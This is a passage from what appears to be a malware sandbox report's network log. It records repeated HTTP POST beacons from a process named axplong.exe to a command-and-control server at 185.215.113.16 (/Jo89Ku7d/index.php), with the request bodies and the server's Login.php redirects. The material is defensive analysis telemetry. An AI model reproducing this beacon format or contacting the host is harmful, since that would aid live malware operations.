                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:54:06.230865955 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:54:06 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  58 | 192.168.2.4 | 49795 | 185.215.113.16 | 80 | 7556 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 25, 2024 13:54:06.463928938 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:54:07.232636929 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:54:07 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  59 | 192.168.2.4 | 49796 | 185.215.113.16 | 80 | 7556 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 25, 2024 13:54:07.253556013 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:54:07.959005117 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:54:07 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  60 | 192.168.2.4 | 49797 | 185.215.113.16 | 80 | 7556 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 25, 2024 13:54:08.157119989 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:54:08.846200943 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:54:08 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  61 | 192.168.2.4 | 49798 | 185.215.113.16 | 80 | 7556 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 25, 2024 13:54:08.855289936 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:54:09.563009977 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:54:09 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  62 | 192.168.2.4 | 49799 | 185.215.113.16 | 80 | 7556 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 25, 2024 13:54:09.681993008 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:54:10.409481049 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:54:10 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  63 | 192.168.2.4 | 49800 | 185.215.113.16 | 80 | 7556 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 25, 2024 13:54:10.420419931 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:54:11.119775057 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:54:10 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  64 | 192.168.2.4 | 49801 | 185.215.113.16 | 80 | 7556 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 25, 2024 13:54:11.248302937 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:54:12.031104088 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:54:11 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  65 | 192.168.2.4 | 49802 | 185.215.113.16 | 80 | 7556 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 25, 2024 13:54:12.040210962 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  66 | 192.168.2.4 | 49803 | 185.215.113.16 | 80 | 7556 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 25, 2024 13:54:12.166439056 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:54:12.885569096 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:54:12 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  67 | 192.168.2.4 | 49804 | 185.215.113.16 | 80 | 7556 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 25, 2024 13:54:12.894805908 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:54:13.611041069 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:54:13 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  68 | 192.168.2.4 | 49805 | 185.215.113.16 | 80 | 7556 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 25, 2024 13:54:13.759890079 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:54:14.458631992 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:54:14 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  69 | 192.168.2.4 | 49806 | 185.215.113.16 | 80 | 7556 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 25, 2024 13:54:14.469579935 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:54:15.163230896 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:54:15 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  70 | 192.168.2.4 | 49807 | 185.215.113.16 | 80 | 7556 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 25, 2024 13:54:15.276288033 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:54:15.992047071 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:54:15 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  71 | 192.168.2.4 | 49808 | 185.215.113.16 | 80 | 7556 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 25, 2024 13:54:16.000624895 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:54:16.723073006 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:54:16 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  72 | 192.168.2.4 | 49809 | 185.215.113.16 | 80 | 7556 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 25, 2024 13:54:16.853842020 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:54:17.549241066 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:54:17 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  73 | 192.168.2.4 | 49810 | 185.215.113.16 | 80 | 7556 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 25, 2024 13:54:17.558481932 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:54:18.270868063 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:54:18 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  74 | 192.168.2.4 | 49811 | 185.215.113.16 | 80 | 7556 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 25, 2024 13:54:18.385695934 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:54:19.096256018 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:54:18 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  75 | 192.168.2.4 | 49812 | 185.215.113.16 | 80 | 7556 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 25, 2024 13:54:19.106663942 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:54:19.828675032 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:54:19 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  76 | 192.168.2.4 | 49813 | 185.215.113.16 | 80 | 7556 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 25, 2024 13:54:19.946607113 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:54:20.647104979 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:54:20 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  77 | 192.168.2.4 | 49814 | 185.215.113.16 | 80 | 7556 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 25, 2024 13:54:20.655774117 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:54:21.355776072 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:54:21 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  78 | 192.168.2.4 | 49815 | 185.215.113.16 | 80 | 7556 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 25, 2024 13:54:21.478291988 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:54:22.181855917 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
